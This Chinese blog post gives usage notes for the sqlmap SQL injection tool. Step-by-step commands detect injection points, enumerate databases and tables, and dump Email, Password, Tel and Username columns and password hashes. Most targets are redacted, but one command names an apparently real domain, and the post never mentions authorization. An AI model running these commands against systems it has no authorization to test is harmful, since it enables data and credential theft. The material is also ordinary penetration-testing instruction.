渗透神器sqlmap的使用笔记

来源:互联网 发布:汽车单片机 编辑:程序博客网 时间:2024/04/29 15:18

0x00前言

sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!!

下载地址:https://github.com/sqlmapproject/sqlmap#最快的使用,不过有点麻烦咯

集成环境:http://pan.baidu.com/s/1hssCKQS#Appie 里面安装了sqlmap

集成系统:https://www.kali.org/downloads/#kali-Linux下安装有sqlmap


0x01 发现注入点

强调:sqlmap 并不擅长发现注入点,所以必须通过其他方式发现注入点。这些方式有:使用AWVS 进行漏扫、APPSCAN漏扫、burpsuite进行检测、手工挖掘(经验很重要),因为本文重点是介绍在发现注入点之后的工作,所以不对如何发现注入点进行详细介绍。我们需要使用txt文本来记录下注入点的地址和数据。作为后面参数的输入。


0x02 检测注入点

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.PHP?pid=7" --random-agent


实践1 : 因为众多的原因,测试过程会出现很多的 “  [Y/n]  ” 之类的提示。我们可以附加参数 --batch

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --random-agent --batch

实践2 :为了加快速度和增加检测的多样性

sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" --data="item=1" --level=5 --risk=3 --ignore-proxy --delay=2 --timeout=60 --threads=6

实践3:进行表单数据注入

sqlmap -u "http://www.XXX.cn/admins" --forms 

实践4:当我们进行手机服务端的注入时

sqlmap -u "http://www.ahujhc.cn:80/ldxx/ldxx.php?pid=7" --mobile --time-sec=30

实践5:使用文本导入数据

sqlmap -r E:\temporary\www.XXX.cn.txt  --random-agent --batch --level=3 --risk=3  --timeout=60 --threads=3 --ignore-proxy --delay=2


0x03 暴力破解数据库名称和数目

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3


实践1: 可以附加的参数为: --union-cols=1-30 --union-char=NULL,CHAR

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3 --union-cols=1-30 --union-char=NULL,CHAR

实践2:列出web当前使用的数据库

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --current-db

实践3:尽可能详细的信息

 sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" -b --current-db --privileges --is-dba --current user --roles --users --hostname --passwords --comments -v 0


0x04 暴力破解一个数据库中的所有表

$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 --tables


0x05 读取某个数据库中个某表的所有列

$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user --columns


0x06 读取列中的具体内容

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user -C "Email,Password,Tel,Uname,Username" --dump


实践1 :如果数据过大,可以抽取一部分数据

sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" -D jhxy2 -T web_user -C" Email,Password,Tel,Uname,Username"  --start=1 --stop=10 --dump


0 0
原创粉丝点击